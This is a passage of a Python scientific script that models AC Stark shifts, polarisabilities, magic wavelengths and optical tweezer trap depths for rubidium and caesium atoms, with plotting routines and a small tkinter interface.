of light in m/s\r\neps0 = 8.85419e-12 # permittivity of free space in m^-3 kg^-1 s^4 A^2\r\nh = 6.6260700e-34 # Planck's constant in m^2 kg / s\r\nhbar = 1.0545718e-34 # reduced Planck's constant in m^2 kg / s\r\na0 = 5.29177e-11 # Bohr radius in m\r\ne = 1.6021766208e-19 # magnitude of the charge on an electron in C\r\nme = 9.10938356e-31 # mass of an electron in kg\r\nkB = 1.38064852e-23 # Boltzmann's constant in m^2 kg s^-2 K^-1\r\namu = 1.6605390e-27 # atomic mass unit in kg\r\nEh = me * e**4 /(4. 
*np.pi *eps0 *hbar)**2 # the Hartree energy\r\nau = e**2 * a0**2 / Eh # atomic unit for polarisability\r\n# note that atomic unit au = 4 pi eps0 a0^3\r\n\r\n#############################\r\n\r\n##### example functions:#####\r\n\r\n#############################\r\n \r\ndef getMagicWavelengths(deltaE, E, wavelengths):\r\n \"\"\"Find the magic wavelengths where the energy difference is zero.\r\n Define this where the fractional difference |deltaE/E| < 0.05 and the \r\n difference deltaE changes sign\"\"\"\r\n\r\n magicWavelengths = []\r\n magicindexes = np.where(abs(deltaE/E)<0.05)[0]\r\n \r\n for mi in magicindexes:\r\n if np.sign(deltaE[mi]) == -np.sign(deltaE[mi+1]):\r\n magicWavelengths.append(wavelengths[mi])\r\n \r\n return magicWavelengths\r\n \r\ndef plotStarkShifts(ATOM1 = atom(atm = 'Rb87'),ATOM2 = atom(atm = 'Cs133'), wavelength = 880e-9, # laser wavelength in nm\r\n beamwaist = 1e-6, # beam waist in m\r\n power = 20e-3): # power in Watts\r\n \"\"\"Find the ac Stark Shifts in Rb, Cs\"\"\"\r\n # typical optical tweezer parameters:\r\n bprop = [wavelength, power, beamwaist] # collect beam properties\r\n\r\n # mass, (L,J,F,MF), bprop, dipole matrix elements (Cm), resonant frequencies (rad/s),\r\n # linewidths (rad/s), state labels, nuclear spin, atomic symbol.\r\n Rb5S = dipole(ATOM1, (0,1/2.,1,1), bprop)\r\n \r\n Rb5P = dipole(ATOM1, (1,3/2.,1,1), bprop)\r\n \r\n Cs6S = dipole(ATOM2, (0,1/2.,3,3), bprop)\r\n \r\n Cs6P = dipole(ATOM2, (1,3/2.,3,3), bprop)\r\n \r\n # need a small spacing to resolve the magic wavelengths - so it will run slow\r\n # to resolve magic wavelengths, take about 10,000 points.\r\n wavels = np.linspace(700e-9, 1100e-9, 500) \r\n \r\n # ac Stark Shift in Joules:\r\n dE6S = Cs6S.acStarkShift(0,0,0,wavels, mj=0.5, HF=False)\r\n # average over mj states\r\n dE6P = 0.5*(Cs6P.acStarkShift(0,0,0,wavels, mj=1.5, HF=False) + \r\n Cs6P.acStarkShift(0,0,0,wavels, mj=0.5, HF=False))\r\n dif6P = dE6P - dE6S\r\n \r\n magic6P = getMagicWavelengths(dif6P, dE6P, wavels)\r\n \r\n plt.figure()\r\n plt.title(\"AC Stark Shift in $^{133}$Cs\")\r\n plt.plot(wavels*1e9, dE6S/h*1e-6, 'b--', label='Ground S$_{1/2}$')\r\n plt.plot(wavels*1e9, dE6P/h*1e-6, 'r-.', label='Excited P$_{3/2}$')\r\n plt.plot(wavels*1e9, (dif6P)/h*1e-6, 'k', label='Difference')\r\n plt.plot([magic6P[0]*1e9]*2, [min(dif6P/h/1e6),max(dif6P/h/1e6)], 'm:',\r\n label = 'Magic Wavelength')\r\n plt.legend()\r\n for mw in magic6P[1:]:\r\n plt.plot([mw*1e9]*2, [min(dif6P/h/1e6),max(dif6P/h/1e6)], 'm:')\r\n plt.ylabel(\"Stark Shift (MHz)\")\r\n plt.xlabel(\"Wavelength (nm)\")\r\n plt.xlim(wavels[0]*1e9, wavels[-1]*1e9)\r\n plt.ylim(-2200,2200)\r\n plt.plot(wavels*1e9, np.zeros(len(wavels)), 'k', alpha=0.25) # show zero crossing\r\n plt.show()\r\n print(\"Magic wavelengths at:\\n\", magic6P)\r\n \r\n \r\n # ac Stark Shift in Joules:\r\n dE5S = Rb5S.acStarkShift(0,0,0,wavels, mj=0.5, HF=False)\r\n # average over mj states\r\n dE5P = 0.5*(Rb5P.acStarkShift(0,0,0,wavels, mj=1.5, HF=False) + \r\n Rb5P.acStarkShift(0,0,0,wavels, mj=0.5, HF=False))\r\n dif5P = dE5P - dE5S\r\n\r\n plt.figure()\r\n plt.title(\"AC Stark Shift in $^{87}$Rb\")\r\n plt.plot(wavels*1e9, dE5S/h*1e-6, 'b--', label='Ground S$_{1/2}$')\r\n plt.plot(wavels*1e9, dE5P/h*1e-6, 'r-.', label='Excited P$_{3/2}$')\r\n plt.plot(wavels*1e9, (dif5P)/h*1e-6, 'k', label='Difference')\r\n plt.legend()\r\n plt.ylabel(\"Stark Shift (MHz)\")\r\n plt.xlabel(\"Wavelength (nm)\")\r\n plt.ylim(-500,500)\r\n plt.plot(wavels*1e9, np.zeros(len(wavels)), 'k', alpha=0.25) # show 
zero crossing\r\n plt.show()\r\n \r\ndef compareArora():\r\n \"\"\"Plot Fig. 5 - 8 in Arora et al 2007 to show that the polarisabilities \r\n of Rb and Cs without hyperfine levels are correct\"\"\"\r\n # beam properties: wavelength, power, beam waist\r\n # intensity set to 1e10 MW/cm^2\r\n bprop = [1064e-9, np.pi*0.5e-2, 1e-6]\r\n \r\n for ATOM in [atom(atm = 'Rb87'), atom(atm = 'Cs133')]:\r\n if ATOM.X == 'Rb87':\r\n wavel1 = np.linspace(780, 800, 200)*1e-9\r\n Ylim1 = (-8000, 8000)\r\n wavel2 = np.linspace(787,794, 200)*1e-9 \r\n Ylim2 = (-1000, 1000)\r\n FS, FP = 1, 3\r\n elif ATOM.X == 'Cs133':\r\n wavel1 = np.linspace(925, 1000, 200)*1e-9\r\n Ylim1 = (-1000, 5000)\r\n wavel2 = np.linspace(927, 945, 200)*1e-9\r\n Ylim2 = (-100, 100)\r\n FS, FP = 3, 5\r\n \r\n S = dipole(ATOM, (0,1/2.,FS,FS), bprop)\r\n \r\n P3 = dipole(ATOM, (1,3/2.,FP,FP), bprop)\r\n \r\n # compare polarisability of excited states\r\n plt.figure()\r\n plt.title(\"Polarisability of \"+ATOM.X)\r\n plt.plot(wavel1*1e9, S.polarisability(wavel1)/au, 'r', label='s')\r\n plt.plot(wavel1*1e9, P3.polarisability(wavel1,mj=0.5)/au, 'g--', label='p$_{3/2}$, mj=1/2')\r\n plt.plot(wavel1*1e9, P3.polarisability(wavel1,mj=1.5)/au, 'm:', label='p$_{3/2}$, mj=3/2')\r\n plt.legend()\r\n plt.xlabel(\"Wavelength (nm)\")\r\n plt.ylabel(\"Polarisability (a.u.)\")\r\n plt.ylim(Ylim1)\r\n plt.xlim(wavel1[0]*1e9, wavel1[-1]*1e9)\r\n \r\n # calculate stark shifts between F, MF states\r\n mfLS = ['r', 'g--', 'm:', 'c-.', 'k-.', 'y'] # line styles\r\n plt.figure()\r\n plt.title(\"AC Stark Shifts for transitions from P$_{3/2}$ m$_F$ to \\nthe groundstate in \"+ATOM.X)\r\n dES = S.acStarkShift(0,0,0, wavel2, HF=True) # ground state stark shift\r\n for MF in range(FP+1):\r\n P3.MF = MF\r\n dEPMF = P3.acStarkShift(0,0,0, wavel2, HF=True) # excited MF state stark shift\r\n plt.plot(wavel2*1e9, (dEPMF - dES)/h/1e6, mfLS[MF], label=r'm$_F$ = $\\pm$'+str(MF))\r\n xlims = [wavel2[0]*1e9, wavel2[-1]*1e9]\r\n plt.plot(xlims, [0,0], 'k:', alpha=0.4) # show where zero is\r\n plt.ylim(Ylim2)\r\n plt.xlim(xlims)\r\n plt.xlabel(\"Wavelength (nm)\")\r\n plt.ylabel(\"Stark Shift (MHz)\")\r\n plt.legend()\r\n \r\n plt.show()\r\n \r\n \r\n \r\ndef getStarkShift(obj):\r\n \"\"\"Print the ac Stark Shift for all of the hyperfine levels in a particular\r\n fine structure state of the atom in dipoleObject\"\"\"\r\n Lterms = ['S', 'P', 'D', 'F', 'G'] # labels for angular momentum states\r\n\r\n # show some important parameters\r\n outstring = obj.X + \" \" + Lterms[obj.L] + str(int(obj.J*2)\r\n ) + \"/2 ac Stark Shift at %.0f nm for E field %.2g V/m:\\n\"%(\r\n obj.field.lam*1e9, obj.field.E0)\r\n \r\n outstring += \"\\nIf hyperfine splitting is insignificant:\\n\"\r\n for MJ in np.arange(1, 2*obj.J+1, 2).astype(int): # NB: this is 2*MJ\r\n outstring += \"MJ = \"+str(MJ)+\"/2 : %.5g MHz\\n\"%(\r\n obj.acStarkShift(0,0,0, obj.field.lam, mj=MJ/2., HF=False)/h/1e6)\r\n a = np.zeros(4) # make sure the results are always a size 3 array\r\n alpha = obj.polarisability(wavel=obj.field.lam, mj=MJ/2., HF=False, split=True)\r\n atot = obj.polarisability(wavel=obj.field.lam, mj=MJ/2., HF=False, split=False)\r\n a[:np.size(alpha)] = alpha\r\n outstring += \"polarisability components (scalar, vector, tensor) : \\n(%.4g, %.4g, %.4g) a.u.\\n\"%(\r\n a[0]/au, a[1]/au, a[2]/au)\r\n outstring += \"combined polarisability : %.4g a.u\\n\"%(atot/au)\r\n \r\n \r\n outstring += \"\\nIf hyperfine splitting is significant:\\n\"\r\n for F in range(int(abs(obj.I - obj.J)), int(obj.I + obj.J+1)):\r\n 
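# average the ac Stark shift over all 2F+1 mF sublevels of this hyperfine level F\r\n 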
mfAveShift = 0\r\n for MF in range(-F, F+1):\r\n obj.F, obj.MF = F, MF\r\n mfAveShift += obj.acStarkShift(0,0,0, obj.field.lam, HF=True)/h/1e6\r\n outstring += \"F = \"+str(F)+ \", ave. mF : %.5g MHz.\\n\"%(mfAveShift/(2.*F+1.))\r\n obj.F, obj.MF = F, F\r\n outstring += \"|\"+str(F)+\",\"+str(F)+\"> : %.5g MHz\\n\"%(\r\n obj.acStarkShift(0,0,0, obj.field.lam, HF=True)/h/1e6)\r\n\r\n a = np.zeros(4) # make sure the results are always a size 3 array\r\n alpha = obj.polarisability(wavel=obj.field.lam, HF=True, split=True)\r\n atot = obj.polarisability(wavel=obj.field.lam, HF=True, split=False)\r\n a[:np.size(alpha)] = alpha\r\n outstring += \"polarisability components (scalar, vector, tensor) : \\n(%.4g, %.4g, %.4g) a.u.\\n\"%(\r\n a[0]/au, a[1]/au, a[2]/au)\r\n outstring += \"combined polarisability : %.4g a.u\\n\\n\"%(atot/au)\r\n \r\n return outstring\r\n \r\ndef runGUI():\r\n \"\"\"A UI to get the stark shift from a user supplied state\"\"\"\r\n import tkinter\r\n from tkinter import messagebox\r\n \r\n root = tkinter.Tk() # main window\r\n frames, labels, entries = [], [], [] # the user must enter variables\r\n labeltext = ['Wavelength (m): ', 'Beam waist (m): ', 'Beam power (W): ', \r\n 'Atom (Rb87/Cs133): ', 'Orbital angular momentum L: ', \r\n 'Total angular momentum J: ']\r\n entrystrings = [tkinter.StringVar() for i in range(len(labeltext))]\r\n default = ['932e-9', '1e-6', '3.9e-3', 'Cs133', '0', '0.5']\r\n \r\n \r\n for i in range(len(labeltext)):\r\n frames.append(tkinter.Frame(root)) # frame for placing entries\r\n frames[-1].pack(side=tkinter.TOP) # position in descending order\r\n labels.append(tkinter.Label(frames[-1], text=labeltext[i]))\r\n labels[-1].pack(side=tkinter.LEFT) # position label on left\r\n entries.append(tkinter.Entry(frames[-1], textvariable=entrystrings[i]))\r\n entrystrings[i].set(default[i]) # set default string text\r\n entries[-1].pack(side=tkinter.RIGHT)# text entry on right\r\n \r\n \r\n def showResult():\r\n wavelength = float(entrystrings[0].get()) # laser wavelength in nm\r\n beamwaist = float(entrystrings[1].get()) # beam waist in m\r\n power = float(entrystrings[2].get()) # power in Watts \r\n bprop = [wavelength, power, beamwaist] # collect beam properties\r\n atomSymbol = entrystrings[3].get() # choose Rb or Cs\r\n L = int(entrystrings[4].get()) # orbital angular momentum\r\n J = float(entrystrings[5].get()) # total angular momentum\r\n \r\n # choose element\r\n if atomSymbol == \"Rb87\":\r\n atomObj = atom(atm = 'Rb87')\r\n F = 1\r\n elif atomSymbol == \"Cs133\":\r\n atomObj = atom(atm = 'Cs133')\r\n F = 3\r\n elif atomSymbol == \"K41\":\r\n atomObj = atom(atm = 'K41')\r\n F = 1\r\n else:\r\n messagebox.showinfo(\"Error\", \"You must choose Rb87, Cs133 or K41\")\r\n return 0\r\n \r\n # get transition data for the given state\r\n if L == 0:\r\n D0, w0, lw, nlj = atomObj.D0S, atomObj.w0S, atomObj.lwS, atomObj.nljS\r\n elif L == 1 and J == 0.5:\r\n D0, w0, lw, nlj = atomObj.D0P1, atomObj.w0P1, atomObj.lwP1, atomObj.nljP1\r\n elif L == 1 and J == 1.5:\r\n D0, w0, lw, nlj = atomObj.D0P3, atomObj.w0P3, atomObj.lwP3, atomObj.nljP3\r\n \r\n # construct the instance of the dipole class\r\n dipoleObj = dipole(atomObj, (L,J,F,F), bprop)\r\n \r\n messagebox.showinfo(\"Calculation Result\", getStarkShift(dipoleObj))\r\n \r\n resultButton = tkinter.Button(root, text=\"Calculate Stark Shifts\", \r\n command=showResult)\r\n resultButton.pack(side = tkinter.BOTTOM)\r\n \r\n root.mainloop()\r\n \r\n \r\ndef combinedTrap(Cswl = 1064e-9, # wavelength of the Cs 
tweezer trap in m\r\n Rbwl = 880e-9, # wavelength of the Rb tweezer trap in m\r\n power = 6e-3, # power of Cs tweezer beam in W\r\n Rbpower = -1, # power of Rb tweezer beam in W \r\n beamwaist = 1e-6): # beam waist in m\r\n \"\"\"Model tweezer traps for Rb and Cs and find the potential each experiences\r\n when they're overlapping. Should fix the separate tweezer trap depths to >1mK.\r\n We also want Rb to experience a deeper trap from its tweezer than from the Cs\r\n tweezer so that there isn't too much heating during merging.\r\n args:\r\n Cswl = 1064e-9, # wavelength of the Cs tweezer trap in m\r\n Rbwl = 880e-9, # wavelength of the Rb tweezer trap in m\r\n power = 6e-3, # power of Cs tweezer beam in W\r\n Rbpower = -1, # power of Rb tweezer beam in W (if < 0 then choose a power\r\n such that both species experience the same trap depth when the tweezers are\r\n overlapping)\r\n beamwaist = 1e-6 # beam waist in m\r\n \"\"\"\r\n bprop = [Cswl, power, beamwaist] # collect beam properties\r\n \r\n # For the 1064nm trap:\r\n # mass, (L,J,F,MF), bprop, dipole matrix elements (Cm), resonant frequencies (rad/s),\r\n # linewidths (rad/s), state labels, nuclear spin, atomic symbol.\r\n # groundstate rubidium\r\n Rb = atom(atm = 'Rb87')\r\n Rb1064 = dipole(Rb, (0,1/2.,1,1), bprop)\r\n \r\n # groundstate caesium\r\n Cs = atom(atm = 'Cs133')\r\n Cs1064 = dipole(Cs, (0,1/2.,4,4), bprop)\r\n \r\n CsP = dipole(Cs, (1,3/2.,5,5), bprop)\r\n \r\n # set the power of the traps so that the trap depth experienced by each \r\n # species in the overlapping trap is the same:\r\n if Rbpower < 0:\r\n Rbpower = (Cs1064.polarisability(Cswl,mj=0.5) - Rb1064.polarisability(Cswl, mj=0.5)) / (Rb1064.polarisability(Rbwl, mj=0.5) - Cs1064.polarisability(Rbwl, mj=0.5)) * power\r\n \r\n # for the 880nm trap:\r\n bprop = [Rbwl, abs(Rbpower), beamwaist]\r\n Rb880 = dipole(Rb, (0,1/2.,1,1), bprop)\r\n \r\n Cs880 = dipole(Cs, (0,1/2.,3,3), bprop)\r\n \r\n \r\n # in the trap with both tweezers overlapping: \r\n U0 = abs(Rb1064.acStarkShift(0,0,0) + Rb880.acStarkShift(0,0,0))\r\n wrRb = np.sqrt(4*U0 / Rb.m / beamwaist**2) /2. /np.pi /1e3\r\n wrCs = np.sqrt(4*U0 / Cs.m / beamwaist**2) /2. /np.pi /1e3\r\n print(\"%.0f beam power: %.3g mW\\t\\t%.0f beam power: %.3g mW\"%(Cswl*1e9, power*1e3, Rbwl*1e9, Rbpower*1e3))\r\n print(\"\"\"In the combined %.0fnm and %.0fnm trap with a depth of %.3g mK the radial trapping frequencies are: \r\nRubidium: %.0f kHz \\nCaesium: %.0f kHz\"\"\"%(Rbwl*1e9, Cswl*1e9, U0/kB*1e3, wrRb, wrCs))\r\n \r\n # with just the Cs tweezer trap:\r\n URb =abs(Rb1064.acStarkShift(0,0,0))\r\n wrRb1064 = np.sqrt(4*URb / Rb.m / beamwaist**2) /2. /np.pi /1e3\r\n UCs = abs(Cs1064.acStarkShift(0,0,0))\r\n wrCs1064 = np.sqrt(4*UCs / Cs.m / beamwaist**2) /2. 
/np.pi /1e3\r\n print(\"\"\"\\nIn just the %.0fnm trap:\r\n Rubidium has trap depth %.3g mK\r\n radial trapping frequency %.0f kHz\r\n Caesium has trap depth %.3g mK\r\n radial trapping frequency %.0f kHz\"\"\"%(Cswl*1e9, URb/kB*1e3, wrRb1064, UCs/kB*1e3, wrCs1064))\r\n \r\n print(getStarkShift(Cs1064))\r\n print(getStarkShift(CsP))\r\n \r\n # plot merging traps:\r\n n = 5 # number of time steps in merging to plot\r\n sep = np.linspace(0, 10e-6, n) # initial separation of the tweezer traps\r\n zs = np.linspace(-2, 10, 200)*1e-6 # positions along the beam axis\r\n \r\n for atoms in [[Rb1064, Rb880], [Cs1064, Cs880]]:\r\n plt.figure()\r\n plt.subplots_adjust(hspace=0.01)\r\n \r\n for i in range(n):\r\n ax = plt.subplot2grid((n,1), (i,0))\r\n \r\n U = (atoms[0].acStarkShift(0,0,zs) + atoms[1].acStarkShift(0,0,zs-sep[n-i-1]))/kB*1e3 # combined potential along the beam axis\r\n U1064 = atoms[0].acStarkShift(0,0,zs)/kB*1e3 # potential in the 1064 trap\r\n U880 = atoms[1].acStarkShift(0,0,zs-sep[n-i-1])/kB*1e3 # potential in the 880 trap\r\n plt.plot(zs*1e6, U, 'k')\r\n plt.plot(zs*1e6, U1064, color='tab:orange', alpha=0.6)\r\n plt.plot(zs*1e6, U880, color='tab:blue', alpha=0.6)\r\n plt.plot([0]*2, [min(U),0], color='tab:orange', linewidth=10, label='%.0f'%(Cswl*1e9), alpha=0.4)\r\n plt.plot([sep[n-i-1]*1e6]*2, [min(U),0], color='tab:blue', linewidth=10, label='%.0f'%(Rbwl*1e9), alpha=0.4)\r\n ax.set_xticks([])\r\n ax.set_yticks([])\r\n\r\n if i == 0:\r\n ax.set_title(\"Optical potential experienced by \"+atoms[0].X\r\n +\"\\n%.0f beam power: %.3g mW %.0f beam power: %.3g mW\"%(Cswl*1e9, power*1e3, Rbwl*1e9, Rbpower*1e3),\r\n pad = 25)\r\n plt.legend(bbox_to_anchor=(0., 1.02, 1., .102), loc=3, ncol=2, mode=\"expand\", borderaxespad=0.)\r\n \r\n \r\n plt.xlabel(r'Position ($\\mu$m)')\r\n ax.set_xticks(sep*1e6)\r\n plt.ylabel('Trap Depth (mK)')\r\n ax.yaxis.set_major_locator(AutoLocator())\r\n \r\n plt.show()\r\n \r\n \r\ndef getMFStarkShifts(ATOM, wavelength = 1064e-9, # laser wavelength in m\r\n power = 0.00906143, # laser power in W\r\n beamwaist = 1e-6 # beam waist in m\r\n ):\r\n \"\"\"Return the Stark shifts of the MF states for cooling/repump transitions\"\"\"\r\n bprop = [wavelength, power, beamwaist] # collect beam properties\r\n if ATOM.atm == 'Cs133': # assign the relevant hyperfine transitions\r\n Fs = [3,4]\r\n l1 = [18,24] # index of lines for making legend\r\n elif ATOM.atm == 'Rb87':\r\n Fs = [1,2]\r\n l1 = [6,12] # index of lines for making legend\r\n \r\n # print(\"Stark shift of \"+ATOM.X+\" S1/2 F = %s, %s -> P3/2 F' = %s, %s for different MF states.\"%(Fs[0],Fs[0]+1,Fs[1],Fs[1]+1))\r\n \r\n plt.figure()\r\n colors = plt.rcParams['axes.prop_cycle'].by_key()['color']\r\n for F in Fs:\r\n for MF in range(-F, F+1):\r\n print(\" ----- |F = \"+str(F)+\", m_F = \"+str(MF)+\">\")\r\n for MFp in range(MF-1, MF+2):\r\n S = dipole(ATOM, (0,1/2.,F,MF), bprop)\r\n P = dipole(ATOM, (1,3/2.,F+1,MFp), bprop)\r\n shift = (S.acStarkShift(0,0,0, bprop[0], HF=True) - P.acStarkShift(0,0,0, bprop[0], HF=True))/h/1e6\r\n if MF != 0:\r\n deltaMF = (MFp-MF)*np.sign(MF)\r\n else:\r\n deltaMF = (MFp-MF)\r\n plt.plot(MF, shift, '_', color=colors[F-1], alpha=0.33*(2+deltaMF), markersize=15, linewidth=10)\r\n print(\"|F' = \"+str(F+1)+\", m_F' = \"+str(MFp)+\"> : %.5g MHz\"%shift)\r\n \r\n plt.xlabel(\"$M_F$\") \r\n plt.ylabel(\"AC Stark Shift (MHz)\")\r\n lines = plt.gca().lines\r\n plt.legend(lines[l1[0]:l1[1]], ['F='+str(f)+r', $\\Delta M_F=$'+str(-dmf) \r\n for f in range(min(Fs),max(Fs)+1) for dmf in 
range(-1,2)])\r\n plt.show()\r\n\r\n''' rvb 15.05.2019: I've just added this function so I can work out lightshifts for the LGM -\r\n haven't changed anything else! \r\n Interested in the Cs (Rb) shifts of the F' = 4 (2) mF states relative to each other.\r\n \r\n '''\r\ndef vmfSS(ATOM):\r\n \"\"\"Return the Stark shifts of the MF states for Cs cooling/repump transitions\"\"\"\r\n \r\n plt.figure()\r\n \r\n if ATOM.atm == 'Cs133':\r\n Cs = ATOM\r\n F = 5\r\n bprop = [938e-9, 8e-3, 1.7e-6] # wavelength, beam power, beam waist\r\n for MFp in range(-F, F+1, 1):\r\n P = dipole(Cs, (1,3/2.,F,MFp), bprop)\r\n Pshift = P.acStarkShift(0,0,0, bprop[0], HF=True)/h/1e6 # interested in how the EStates shift relative to each other\r\n plt.plot(MFp, Pshift, '_', markersize=15, linewidth=10, color = '#7E317B')\r\n print(\"|F' = \"+str(F)+\", m_F' = \"+str(MFp)+\"> : %.5g MHz\"%Pshift)\r\n \r\n elif ATOM.atm == 'Rb87':\r\n Rb = ATOM\r\n F = 3\r\n bprop = [940e-9, 35e-3, 1.7e-6] # wavelength, beam power, beam waist\r\n for MFp in range(-F, F+1, 1):\r\n P = dipole(Rb, (1,3/2.,F,MFp), bprop)\r\n Pshift = P.acStarkShift(0,0,0, bprop[0], HF=True)/h/1e6 # interested in how the EStates shift relative to each other\r\n s, v, t = P.polarisability(bprop[0], mj=3/2, HF=False, split=True)\r\n # print('split ',s/au, t/au)\r\n s, v, t = P.polarisability(bprop[0], mj=3/2, HF=True, split=True)\r\n # print('avrge ',s/au, t/au)\r\n plt.plot(MFp, Pshift, '_', markersize=15, linewidth=10, color = '#7E317B')\r\n print(\"|F' = \"+str(F)+\", m_F' = \"+str(MFp)+\"> : %.5g MHz\"%Pshift)\r\n \r\n plt.title('Stark Shifts of ' + ATOM.atm + \" |F' = \" + str(F) + ', $M_F$> states' ) \r\n plt.xlabel(\"$M_F$\") \r\n plt.ylabel(\"AC Stark Shift (MHz)\")\r\n plt.show()\r\n\r\n\r\ndef compareKien():\r\n \"\"\"compare Kien 2013 Fig 4,5\"\"\"\r\n bprop =[880e-9,20e-3,1e-6]\r\n Cs = atom(atm = 'Cs133')\r\n Cs880 = dipole(Cs, (0,1/2.,3,3), bprop)\r\n \r\n CsP = dipole(Cs, (1,3/2.,3,3), bprop) \r\n \r\n wls = [np.linspace(680, 690, 200)*1e-9, np.linspace(930, 940, 200)*1e-9]\r\n ylims = [(-1200, 300), (-3000, 6000)]\r\n for ii in range(2):\r\n plt.figure()\r\n plt.title(\"Cs Polarisabilities. Red: 6S$_{1/2}$, Blue: 6P$_{3/2}$.\\nscalar: solid, vector: dashed, tensor: dotted\")\r\n a1 = Cs880.polarisability(wls[ii],mj=0.5,split=True)\r\n a2 = 0.5*(np.array(CsP.polarisability(wls[ii],mj=1.5, split=True))+\r\n np.array(CsP.polarisability(wls[ii],mj=0.5, split=True)))\r\n ls = ['-', '--', ':']\r\n for i in range(3):\r\n plt.plot(wls[ii]*1e9, a1[i]/au, 'r', linestyle=ls[i], label=\"Cs\")\r\n plt.plot(wls[ii]*1e9, a2[i]/au, 'b', linestyle=ls[i], label=\"$P_{3/2}$\")\r\n #plt.legend()\r\n plt.ylim(ylims[ii])\r\n plt.xlabel(\"Wavelength (nm)\")\r\n plt.ylabel(\"Polarisablity (a.u.)\")\r\n plt.show()\r\n \r\n\r\ndef check880Trap(wavelength = 880e-9, # wavelength in m\r\n wavels = np.linspace(795,930,500)*1e-9, # wavelengths in m to plot\r\n power = 5e-3, # beam power in W\r\n beamwaist = 1e-6, # beam waist in m\r\n species = 'Rb'): # which species to set a 1mK trap for\r\n \"\"\"Plot graphs of the trap depth experienced by Cs around 880nm when \r\n the ground state Rb trap depth is fixed at 1mK. 
Look at the scattering\r\n rates and hence trap lifetimes that are possible.\"\"\"\r\n bprop = [wavelength, power, beamwaist]\r\n Rb = atom(atm = 'Rb87')\r\n Rb5S = dipole(Rb, (0,1/2.,1,1), bprop)\r\n \r\n Rb5P = dipole(Rb, (1,3/2.,1,1), bprop)\r\n \r\n Cs = atom(atm = 'Cs133') \r\n Cs6S = dipole(Cs, (0,1/2.,3,3), bprop)\r\n \r\n Cs6P = dipole(Cs, (1,3/2.,3,3), bprop) \r\n \r\n # choose power so that Rb trap depth is fixed at 1 mK:\r\n if species == Cs.X:\r\n Powers = abs(1e-3*kB * np.pi * eps0 * c * beamwaist**2 / Cs6S.polarisability(wavels)) # in Watts\r\n else:\r\n Powers = abs(1e-3*kB * np.pi * eps0 * c * beamwaist**2 / Rb5S.polarisability(wavels)) # in Watts\r\n _, ax1 = plt.subplots()\r\n ax1.set_title('Fixing the trap depth of ground state '+species+' at 1 mK')\r\n ax1.set_xlabel('Wavelength (nm)')\r\n ax1.plot(wavels*1e9, Powers*1e3, color='tab:blue')\r\n ax1.set_ylabel('Power (mW)', color='tab:blue')\r\n ax1.tick_params(axis='y', labelcolor='tab:blue')\r\n ax1.set_xlim(wavels[0]*1e9, wavels[-1]*1e9)\r\n # ax1.set_ylim(min(Powers)*1e3-0.5, 15)\r\n\r\n ax2 = ax1.twinx()\r\n # now the power and the wavelength are varied:\r\n Llabels = ['$S_{1/2}$', '$P_{3/2}$']\r\n if species == Cs.X:\r\n colors = ['k', 'tab:orange', 'tab:orange', 'tab:orange']\r\n linestyles = ['--', '-.', '-', ':']\r\n else:\r\n colors = ['tab:orange', 'tab:orange', 'k', 'tab:orange']\r\n linestyles = ['-', '-.', '--', ':']\r\n \r\n trapdepths = []\r\n for obj in [Cs6S, Cs6P, Rb5S, Rb5P]:\r\n res = np.zeros(len(Powers))\r\n for i in range(len(Powers)):\r\n obj.field.E0 = 2 * np.sqrt(Powers[i] / eps0 / c / np.pi)/beamwaist\r\n # average mj states (doesn't have any effect on j=1/2 states)\r\n res[i] = 0.5*(obj.acStarkShift(0,0,0, wavels[i], mj=1.5) + \r\n obj.acStarkShift(0,0,0, wavels[i], mj=0.5))\r\n color = colors.pop(0)\r\n ls = linestyles.pop(0)\r\n ax2.plot(wavels*1e9, res*1e3/kB, color=color, label=obj.X+\" \"+Llabels[obj.L], linestyle=ls)\r\n trapdepths.append(res)\r\n\r\n ax2.plot(wavels*1e9, np.zeros(len(wavels)), 'k', alpha=0.1) # show zero crossing \r\n ax2.set_ylabel('Trap Depth (mK)', color='tab:orange')\r\n ax2.legend()\r\n ax2.set_ylim(-3, 3)\r\n ax2.tick_params(axis='y', labelcolor='tab:orange')\r\n plt.tight_layout()\r\n\r\n I = 2*Powers / np.pi / beamwaist**2\r\n # scattering rate of Cs from the D2 line:\r\n deltaCsD1 = 2*np.pi*c * (1/wavels - 1/Cs.rwS[0]) # detuning from D1 (rad/s)\r\n deltaCsD2 = 2*np.pi*c * (1/wavels - 1/Cs.rwS[35]) # detuning from D2 (rad/s)\r\n IsatCsD1 = 2.4981 *1e-3 *1e4 # saturation intensity for D1 transition, sigma polarised\r\n IsatCsD2 = 1.1023 *1e-3 *1e4 # saturation intensity for D2 transition, pi polarised\r\n CsRsc = 0\r\n for vals in [[Cs.lwS[0], deltaCsD1, IsatCsD1], [Cs.lwS[35], deltaCsD2, IsatCsD2]]:\r\n CsRsc += vals[0]/2. * I/vals[2] / (1 + 4*(vals[1]/vals[0])**2 + I/vals[2])\r\n # Cstau = 1e-3*kB / (hbar*(2*np.pi/wavels))**2 * 2.*Cs.m / CsRsc # the lifetime is the trap depth / recoil energy / scattering rate\r\n Cst = 4*np.sqrt(Cs.m*abs(trapdepths[0])) / (2*np.pi/wavels)**2 /hbar /beamwaist /CsRsc # duration in vibrational ground state (s) = 1/Lamb-Dicke^2 /Rsc\r\n\r\n # scattering rate of Rb from the D1 line:\r\n deltaRbD1 = 2*np.pi*c * (1/wavels - 1/Rb.rwS[0]) # detuning from D1 (rad/s)\r\n IsatRbD1 = 4.484 *1e-3 *1e4 # saturation intensity for D1 transition, pi polarised\r\n RbRsc = Rb.lwS[0]/2. 
* I/IsatRbD1 / (1 + 4*(deltaRbD1/Rb.lwS[0])**2 + I/IsatRbD1) # per second\r\n # Rbtau = 1e-3*kB / (hbar*(2*np.pi/wavels))**2 * 2.*Rb.m / RbRsc # the lifetime is the trap depth / recoil energy / scattering rate\r\n Rbt = 4*np.sqrt(Rb.m*abs(trapdepths[2])) / (2*np.pi/wavels)**2 /hbar /beamwaist /RbRsc # duration in vibrational ground state (s) = 1/Lamb-Dicke^2 /Rsc\r\n\r\n # plot lifetime and scattering rate on the same axis:\r\n for Rsc, ts, X in [[RbRsc, Rbt, Rb.X], [CsRsc, Cst, Cs.X]]:\r\n fig, ax3 = plt.subplots()\r\n ax3.set_title('Scattering rate and lifetime of ground state '+X+' in a 1 mK trap (for '+species+')')\r\n ax3.set_xlabel('Wavelength (nm)')\r\n ax3.semilogy(wavels*1e9, Rsc, color='tab:blue')\r\n ax3.plot(wavels*1e9, np.zeros(len(wavels))+100, '--', color='tab:blue', alpha=0.25) # show acceptable region\r\n ax3.set_ylabel('Scattering rate ($s^{-1}$)', color='tab:blue')\r\n 